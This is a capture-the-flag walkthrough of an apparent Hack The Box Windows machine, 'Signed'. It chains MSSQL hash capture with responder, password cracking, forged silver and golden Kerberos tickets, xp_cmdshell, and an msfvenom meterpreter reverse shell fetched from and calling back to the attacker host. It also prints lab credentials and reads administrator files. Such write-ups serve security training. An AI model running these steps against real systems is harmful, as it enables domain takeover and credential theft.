Medium - Windows - Signed

Created At: Updated At:

Recon

“As is common in real life Windows penetration tests, you will start the Signed box with credentials for the following account which can be used to access the MSSQL service: scott / Sm230#C5NatH”, so we get to login using impacket-mssqlclient 'signed.htb/scott:Sm230#C5NatH@10.129.66.12'. We can do a quick nmap scan to learn more about the service.

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=scott,mssql.password=Sm230#C5NatH,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.66.12
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-12 15:16 BST
Nmap scan report for 10.129.66.12
Host is up (0.035s latency).

Bug in ms-sql-dac: no string output.
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ms-sql-config: ERROR: Script execution failed (use -d to debug)
| ms-sql-info: 
|   10.129.66.12:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ms-sql-hasdbaccess: ERROR: Script execution failed (use -d to debug)
|_ms-sql-tables: ERROR: Script execution failed (use -d to debug)
| ms-sql-xp-cmdshell: 
|_  (Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.)
| ms-sql-dump-hashes: 
|   10.129.66.12:1433: 
|     sa:Null
|_    scott:Null
| ms-sql-empty-password: 
|_  10.129.66.12:1433: 
| ms-sql-ntlm-info: 
|   10.129.66.12:1433: 
|     Target_Name: SIGNED
|     NetBIOS_Domain_Name: SIGNED
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: SIGNED.HTB
|     DNS_Computer_Name: DC01.SIGNED.HTB
|     DNS_Tree_Name: SIGNED.HTB
|_    Product_Version: 10.0.17763

Looking online, we can find CVE-2024-37334, but no POC.

SQL (scott  guest@master)> SELECT name FROM sys.databases;

master   
tempdb  
model    
msdb     
┌──(kali㉿kali)-[/home/kali/PowerUpSQL]
└─PS> Get-SQLServerInfo -Instance "10.129.66.12" -Username "scott" -Password "Sm230#C5NatH"

ComputerName           : 10.129.66.12
Instance               : DC01
DomainName             : SIGNED
ServiceProcessID       : 888
ServiceName            : MSSQLSERVER
ServiceAccount         : SIGNED\mssqlsvc
AuthenticationMode     : Windows and SQL Server Authentication
ForcedEncryption       : 0
Clustered              : No
SQLServerVersionNumber : 16.0.1000.6
SQLServerMajorVersion  : 2022
SQLServerEdition       : Enterprise Evaluation Edition (64-bit)
SQLServerServicePack   : RTM
OSArchitecture         : X64
OsVersionNumber        : SQL
Currentlogin           : scott
IsSysadmin             : No
ActiveSessions         : 1

The service account is different than the user we logged in as. We can run responder -I tun0 and try to execute xp_dirtree against it and crack the hash using john.

SQL (scott  guest@master)> xp_dirtree \\<ip>\thissharedoesntexist

---

┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0
[SMB] NTLMv2-SSP Client   : 10.129.66.12
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::SIGNED:650c1aad4a692032:E5302536320D71D5B5F435698F28BC9A:010100000000000000FD1EB8853BDC0192F4AE5975C9A5DC0000000002000800370034004B004F0001001E00570049004E002D00380039004D004D00530031005A004A0057003300390004003400570049004E002D00380039004D004D00530031005A004A005700330039002E00370034004B004F002E004C004F00430041004C0003001400370034004B004F002E004C004F00430041004C0005001400370034004B004F002E004C004F00430041004C000700080000FD1EB8853BDC0106000400020000000800300030000000000000000000000000300000319EE653B160B28341C3ED4C355F4C30C500A5FDC80C37A5B308A91448C2B9F00A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00370031000000000000000000

We then get to crack the hash.

┌──(kali㉿kali)-[~]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
purPLE9795!@     (mssqlsvc)

Later we can find all of the admins on this mssql.

impacket-mssqlclient 'signed.htb/mssqlsvc:purPLE9795!@@10.129.66.12' -windows-auth -command "SELECT r.name AS role, m.name AS member FROM sys.server_principals r JOIN sys.server_role_members rm ON r.principal_id=rm.role_principal_id JOIN sys.server_principals m ON rm.member_principal_id=m.principal_id WHERE r.name='sysadmin';" 


role       member                      
--------   -------------------------   
sysadmin   sa                          
sysadmin   SIGNED\IT                   
sysadmin   NT SERVICE\SQLWriter        
sysadmin   NT SERVICE\Winmgmt          
sysadmin   NT SERVICE\MSSQLSERVER      
sysadmin   NT SERVICE\SQLSERVERAGENT

We can also get domain sid with SELECT name, sid FROM sys.server_principals WHERE sid IS NOT NULL AND name LIKE 'SIGNED%'; and gain a silver ticket with ticketer. To get it, it’s required that (WITHOUT CHATGPT) you get domain sid and password hash.

impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.signed.htb:1433 -groups 1105 -user-id 1103 mssqlsvc

Then it’s possible to login using export KRB5CCNAME=mssqlsvc.ccache && impacket-mssqlclient -k -no-pass DC01.SIGNED.HTB and finally enable powershell using enable_xp_cmdshell and RECONFIGURE;.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.22 LPORT=2137 -f exe > shell-x64.exe
sudo http-server -p 80           
...and catch with metasploit
---

xp_cmdshell "powershell wget -UseBasicParsing http://10.10.15.22/shell-x64.exe -OutFile %temp%/shell-x64.exe"
xp_cmdshell "%temp%\\shell-x64.exe -nv 10.10.15.22 4444 -e cmd.exe"

and we finaly get user flag with cat /Users/mssqlsvc/Desktop/user.txt

Priv esc

We continue signed, by signing more tickets. Time for the golden ticket. To get it, one of these two sids are needed.

PS C:\Windows\system32> Get-ADGroup "Domain Admins" | Select-Object Name, SID
Get-ADGroup "Domain Admins" | Select-Object Name, SID

Name          SID                                          
----          ---                                          
Domain Admins S-1-5-21-4088429403-1159899800-2753317549-512


PS C:\Windows\system32> Get-ADGroup "Enterprise Admins" | Select-Object Name, SID
Get-ADGroup "Enterprise Admins" | Select-Object Name, SID

Name              SID                                          
----              ---                                          
Enterprise Admins S-1-5-21-4088429403-1159899800-2753317549-519

---

impacket-ticketer -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain SIGNED.HTB -spn MSSQLSvc/DC01.SIGNED.HTB -groups 512,519,1105 -user-id 1103 mssqlsvc

export KRB5CCNAME=mssqlsvc.ccache && impacket-mssqlclient -k -no-pass DC01.SIGNED.HTB

Then we can enable data access and grab the flag.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;
SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\root.txt',SINGLE_CLOB) AS x;

To properly own the machine, password and username of admin can be found in powershell history.
SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt',SINGLE_CLOB) AS x;

Then we can upload and run RunasCs.exe to gain privilaged shell
.\RunasCs.exe Administrator Th1s889Rabb!t powershell.exe -r ip 2138